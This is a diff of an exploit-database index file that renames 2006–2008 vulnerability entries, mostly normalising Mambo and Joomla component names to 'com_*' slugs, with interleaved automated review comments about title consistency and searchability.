 2380,platforms/php/webapps/2380.txt,"UNAK-CMS 1.5 - (dirroot) Remote File Inclusion",2006-09-16,SHiKaA,php,webapps,0
 2381,platforms/php/webapps/2381.txt,"guanxiCRM Business Solution 0.9.1 - Remote File Inclusion",2006-09-16,SHiKaA,php,webapps,0
 2382,platforms/php/webapps/2382.pl,"Zix Forum 1.12 - 'RepId' SQL Injection (2)",2006-09-17,SlimTim10,php,webapps,0
@@ -2308,7 +2308,7 @@ id,file,description,date,author,platform,type,port
 2609,platforms/php/webapps/2609.txt,"Open Meetings Filing Application - Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0
 2611,platforms/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusion",2006-10-21,k1tk4t,php,webapps,0
 2612,platforms/php/webapps/2612.txt,"PGOSD - 'misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0
-2613,platforms/php/webapps/2613.txt,"MambWeather Mambo Module 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps,0
+2613,platforms/php/webapps/2613.txt,"Mambo Module MambWeather 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps,0
 2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - (DNS/RR.php) Remote File Inclusion",2006-10-22,Drago84,php,webapps,0
 2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Inclusion",2006-10-22,k1tk4t,php,webapps,0
 2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - (delete.php) Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0
@@ -2533,7 +2533,7 @@ id,file,description,date,author,platform,type,port
 2849,platforms/asp/webapps/2849.txt,"ASP-Nuke Community 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,asp,webapps,0
 2850,platforms/php/webapps/2850.txt,"Exhibit Engine 1.22 - (styles.php) Remote File Inclusion",2006-11-25,Kacper,php,webapps,0
 2851,platforms/php/webapps/2851.txt,"Hacks List phpBB Mod 1.21 - SQL Injection",2006-11-26,"the master",php,webapps,0
-2852,platforms/php/webapps/2852.txt,"com_flyspray Mambo Com. <= 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps,0
+2852,platforms/php/webapps/2852.txt,"Mambo Component com_flyspray <= 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps,0
 2853,platforms/asp/webapps/2853.txt,"SimpleBlog 2.3 - (admin/edit.asp) SQL Injection",2006-11-26,bolivar,asp,webapps,0
 2854,platforms/windows/dos/2854.py,"AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0
 2855,platforms/windows/dos/2855.py,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0
@@ -2549,7 +2549,7 @@ id,file,description,date,author,platform,type,port
 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit",2006-11-30,cthulhu,windows,remote,69
 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0
 2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0
-2869,platforms/php/webapps/2869.php,"Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0
+2869,platforms/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0
 2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0
 2871,platforms/php/webapps/2871.txt,"LDU 8.x - (polls.php) SQL Injection",2006-11-30,ajann,php,webapps,0
 2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local,0
@@ -2638,7 +2638,7 @@ id,file,description,date,author,platform,type,port
 2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - (archive.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0
 2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0
 2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - (statistic.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0
-2961,platforms/hardware/dos/2961.py,"Hewlett-Packard FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0
+2961,platforms/hardware/dos/2961.py,"Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0
 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - 'down.asp' SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0
 2963,platforms/asp/webapps/2963.txt,"cwmExplorer 1.0 - (show_file) Source Code Disclosure",2006-12-19,ajann,asp,webapps,0
 2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusion",2006-12-20,mdx,php,webapps,0
@@ -3206,7 +3206,7 @@ id,file,description,date,author,platform,type,port
 3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery - 'default.asp catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0
 3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP (Subscribe) Remote Exploit",2007-03-21,"Winny Thomas",windows,remote,143
 3538,platforms/php/webapps/3538.txt,"PHP-revista 1.1.2 - Multiple SQL Injections",2007-03-21,"Cold Zero",php,webapps,0
-3539,platforms/php/webapps/3539.txt,"mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0
+3539,platforms/php/webapps/3539.txt,"Mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0
 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (Egghunter)",2007-03-21,muts,windows,remote,143
 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)",2007-03-22,"Umesh Wanve",windows,remote,69
 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - (BASE) Remote File Inclusion",2007-03-22,GoLd_M,php,webapps,0
@@ -3223,7 +3223,7 @@ id,file,description,date,author,platform,type,port
 3554,platforms/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53
 3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - Info Leakage Exploit (Etherleak)",2007-03-23,"Jon Hart",multiple,remote,0
 3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - (ViewNewspapers.asp) SQL Injection",2007-03-23,ajann,asp,webapps,0
-3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenuFree 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0
+3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0
 3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0
 3559,platforms/multiple/local/3559.php,"PHP 5.2.1 - Unserialize() Local Information Leak Exploit",2007-03-23,"Stefan Esser",multiple,local,0
 3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0
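Review bot: The new title for 3557 swaps the product name `SWmenuFree` for `'com_swmenupro'`, which reads as a different edition rather than a reformatting of the same name. In 2078 or 2206 the old name survives as a substring of the new `com_*` identifier, but here a title search for `swmenufree` no longer returns this row, so a defender checking an installed SWmenuFree against the index would miss it. Whether 3557.txt actually targets a com_swmenupro path cannot be seen from this diff. If both names apply, keep both, e.g. `"Joomla! / Mambo Component 'com_swmenupro' (SWmenuFree) 4.0 - Remote File Inclusion"`.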
@@ -3310,7 +3310,7 @@ id,file,description,date,author,platform,type,port
 3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection",2007-04-02,ajann,php,webapps,0
 3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - (print.php) SQL Injection",2007-04-02,ajann,php,webapps,0
 3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow",2007-04-02,Marsu,windows,local,0
-3648,platforms/windows/local/3648.c,"Irfanview 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local,0
+3648,platforms/windows/local/3648.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local,0
 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 - Server Manager Local Site Buffer Overflow",2007-04-02,Marsu,windows,local,0
 3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0
 3651,platforms/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor '.ani' Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0
@@ -3353,7 +3353,7 @@ id,file,description,date,author,platform,type,port
 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 - 'lang' Local File Inclusion",2007-04-08,Dj7xpl,php,webapps,0
 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0
 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - SQL Injection",2007-04-09,"h a c k e r _ X",php,webapps,0
-3692,platforms/windows/local/3692.c,"Irfanview 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0
+3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0
 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - '.hlp' Local HEAP Overflow (PoC)",2007-04-09,muts,windows,dos,0
 3694,platforms/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion",2007-04-09,Dj7xpl,php,webapps,0
 3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",windows,local,0
@@ -3364,7 +3364,7 @@ id,file,description,date,author,platform,type,port
 3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0
 3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0
 3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution",2007-04-10,BlackHawk,php,webapps,0
-3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0
+3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0
 3704,platforms/php/webapps/3704.txt,"pl-PHP Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0
 3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0
 3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0
@@ -3396,7 +3396,7 @@ id,file,description,date,author,platform,type,port
 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0
 3734,platforms/php/webapps/3734.txt,"Joomla! Component module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0
 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0
-3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0
+3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0
 3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow",2007-04-15,"Winny Thomas",windows,remote,139
 3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - mssql_connect() Remote Buffer Overflow",2007-04-15,rgod,windows,remote,80
 3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection",2007-04-15,Kacper,php,webapps,0
@@ -3471,7 +3471,7 @@ id,file,description,date,author,platform,type,port
 3808,platforms/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)",2007-04-27,shinnai,windows,remote,0
 3809,platforms/php/webapps/3809.txt,"burnCMS 0.2 - (root) Remote File Inclusion",2007-04-27,GoLd_M,php,webapps,0
 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote,0
-3811,platforms/windows/local/3811.c,"Irfanview 4.00 - '.iff' Buffer Overflow",2007-04-27,Marsu,windows,local,0
+3811,platforms/windows/local/3811.c,"IrfanView 4.00 - '.iff' Buffer Overflow",2007-04-27,Marsu,windows,local,0
 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow",2007-04-27,Marsu,windows,local,0
 3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - SQL Injection",2007-04-28,"Mehmet Ince",php,webapps,0
 3814,platforms/php/webapps/3814.txt,"WordPress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0
@@ -3602,7 +3602,7 @@ id,file,description,date,author,platform,type,port
 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0
 3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - (print.php newnr) SQL Injection",2007-05-16,Silentz,php,webapps,0
 3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection",2007-05-16,Silentz,php,webapps,0
-3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0
+3944,platforms/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0
 3945,platforms/linux/dos/3945.rb,"MagicISO 5.4 (build239) - '.cue' Heap Overflow (PoC)",2007-05-17,n00b,linux,dos,0
 3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0
 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion",2007-05-17,"Alkomandoz Hacker",php,webapps,0
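Review bot: The new 3944 title leaves the component slug unquoted (`Mambo Component com_yanc 1.4 Beta`), while the other rows retitled in this commit quote it, as in `'com_sim'` and `'com_hestar'`. The 9714 hunk has the same gap with `com_koesubmit`. The 5935 hunk writes `'articles'` without the `com_` prefix that 3736 gets as `'com_articles'`, which may be intentional but looks like an oversight. Since the index is searched by exact substrings, I would normalise these to `"Mambo Component 'com_yanc' 1.4 Beta - 'id' SQL Injection"` and `"Mambo Component 'com_koesubmit' 1.0.0 - Remote File Inclusion"` so one query pattern matches every component row.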
@@ -4342,7 +4342,7 @@ id,file,description,date,author,platform,type,port
 4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization",2007-12-04,"Ricardo Narvaja",windows,dos,0
 4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0
 4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0
-4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0
+4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0
 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service",2007-12-05,MADYNES,hardware,dos,0
 4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0
 4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0
@@ -4645,7 +4645,7 @@ id,file,description,date,author,platform,type,port
 4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0
 4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0
-4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0
+4998,platforms/windows/local/4998.c,"IrfanView 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0
 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0
 5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
 5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Parameter Remote File Disclosure",2008-01-28,Stack,php,webapps,0
@@ -4654,10 +4654,10 @@ id,file,description,date,author,platform,type,port
 5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
 5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0
 5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
-5007,platforms/php/webapps/5007.txt,"Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
-5008,platforms/php/webapps/5008.txt,"Mambo 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
-5009,platforms/php/webapps/5009.txt,"Mambo 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
-5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
+5007,platforms/php/webapps/5007.txt,"Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5008,platforms/php/webapps/5008.txt,"Mambo Component 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5009,platforms/php/webapps/5009.txt,"Mambo Component 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5010,platforms/php/webapps/5010.txt,"Mambo Component 'com_glossary' 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
 5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0
 5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0
 5013,platforms/php/webapps/5013.php,"WordPress Plugin Adserve 0.2 - adclick.php SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0
@@ -4674,8 +4674,8 @@ id,file,description,date,author,platform,type,port
 5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusion",2008-01-31,"David Wharton",php,webapps,0
 5027,platforms/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure",2008-01-31,muuratsalo,php,webapps,0
 5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0
-5029,platforms/php/webapps/5029.txt,"Mambo Component AkoGallery 2.5b - SQL Injection",2008-01-31,S@BUN,php,webapps,0
-5030,platforms/php/webapps/5030.txt,"Mambo Component Catalogshop 1.0b1 - SQL Injection",2008-01-31,S@BUN,php,webapps,0
+5029,platforms/php/webapps/5029.txt,"Mambo Component 'com_akogallery' 2.5b - SQL Injection",2008-01-31,S@BUN,php,webapps,0
+5030,platforms/php/webapps/5030.txt,"Mambo Component 'com_catalogshop' 1.0b1 - SQL Injection",2008-01-31,S@BUN,php,webapps,0
 5031,platforms/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - SQL Injection",2008-01-31,S@BUN,php,webapps,0
 5032,platforms/windows/local/5032.c,"Total Video Player 1.03 - '.m3u' File Local Buffer Overflow",2008-02-01,"fl0 fl0w",windows,local,0
 5033,platforms/php/webapps/5033.txt,"LightBlog 9.5 - cp_upload_image.php Arbitrary File Upload",2008-02-01,Omni,php,webapps,0
@@ -4702,7 +4702,7 @@ id,file,description,date,author,platform,type,port
 5055,platforms/php/webapps/5055.txt,"Joomla! Component com_Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0
 5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 - (bidhistory.php item_id) SQL Injection",2008-02-04,QTRinux,php,webapps,0
 5057,platforms/php/webapps/5057.txt,"XOOPS 2.0.18 - Local File Inclusion / URL Redirecting",2008-02-04,DSecRG,php,webapps,0
-5058,platforms/php/webapps/5058.txt,"Mambo Component Awesom 0.3.2 - (listid) SQL Injection",2008-02-04,S@BUN,php,webapps,0
+5058,platforms/php/webapps/5058.txt,"Mambo Component 'com_awesom' 0.3.2 - (listid) SQL Injection",2008-02-04,S@BUN,php,webapps,0
 5059,platforms/php/webapps/5059.txt,"Mambo Component Shambo2 - 'itemID' SQL Injection",2008-02-04,S@BUN,php,webapps,0
 5060,platforms/php/webapps/5060.txt,"VHD Web Pack 2.0 - 'index.php' Local File Inclusion",2008-02-04,DSecRG,php,webapps,0
 5061,platforms/php/webapps/5061.txt,"All Club CMS 0.0.1f - 'index.php' Local File Inclusion",2008-02-04,Trancek,php,webapps,0
@@ -4783,7 +4783,7 @@ id,file,description,date,author,platform,type,port
 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0
 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - (download.php url) Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0
 5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0
-5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0
+5139,platforms/php/webapps/5139.txt,"Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0
 5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0
 5141,platforms/windows/local/5141.c,"DESlock+ <= 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC)",2008-02-18,mu-b,windows,local,0
 5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0
@@ -4920,7 +4920,7 @@ id,file,description,date,author,platform,type,port
 5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'links.asp CatId' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0
 5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0
 5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0
-5279,platforms/php/webapps/5279.txt,"Mambo Component accombo 1.x - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0
+5279,platforms/php/webapps/5279.txt,"Mambo Component 'com_accombo' 1.x - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0
 5280,platforms/php/webapps/5280.txt,"Joomla! Component Restaurante 1.0 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0
 5281,platforms/php/webapps/5281.php,"PEEL CMS - Admin Hash Extraction / Arbitrary File Upload",2008-03-19,"Charles Fol",php,webapps,0
 5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0
@@ -4975,7 +4975,7 @@ id,file,description,date,author,platform,type,port
 5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0
 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - (SQL Injection / Cross-Site Scripting / Local File Inclusion) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0
 5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - (show.php id) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0
-5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop 1.51 - (vara) SQL Injection",2008-04-01,S@BUN,php,webapps,0
+5335,platforms/php/webapps/5335.txt,"Mambo Component 'com_ahsshop' 1.51 - 'vara' Parameter SQL Injection",2008-04-01,S@BUN,php,webapps,0
 5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 - Password Retrieve SQL Injection",2008-04-01,girex,php,webapps,0
 5337,platforms/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' SQL Injection",2008-04-01,Stack,php,webapps,0
 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0
@@ -5428,7 +5428,7 @@ id,file,description,date,author,platform,type,port
 5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection",2008-06-12,TheDefaced,php,webapps,0
 5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0
 5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin",2008-06-13,"CWH Underground",php,webapps,0
-5799,platforms/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - (aid) SQL Injection",2008-06-13,Houssamix,php,webapps,0
+5799,platforms/php/webapps/5799.pl,"Mambo Component 'com_galleries' 1.0 - 'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0
 5800,platforms/php/webapps/5800.pl,"Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account)",2008-06-13,Stack,php,webapps,0
 5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - (section) Local File Inclusion",2008-06-13,Loader007,php,webapps,0
 5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) SQL Injection",2008-06-13,"Virangar Security",php,webapps,0
@@ -5437,7 +5437,7 @@ id,file,description,date,author,platform,type,port
 5805,platforms/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0
 5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'listing.php sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps,0
 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0
-5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - (Output.php) Remote File Inclusion",2008-06-13,irk4z,php,webapps,0
+5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - 'Output.php' Remote File Inclusion",2008-06-13,irk4z,php,webapps,0
 5809,platforms/php/webapps/5809.txt,"Pre Job Board - 'JobSearch.php' SQL Injection",2008-06-14,JosS,php,webapps,0
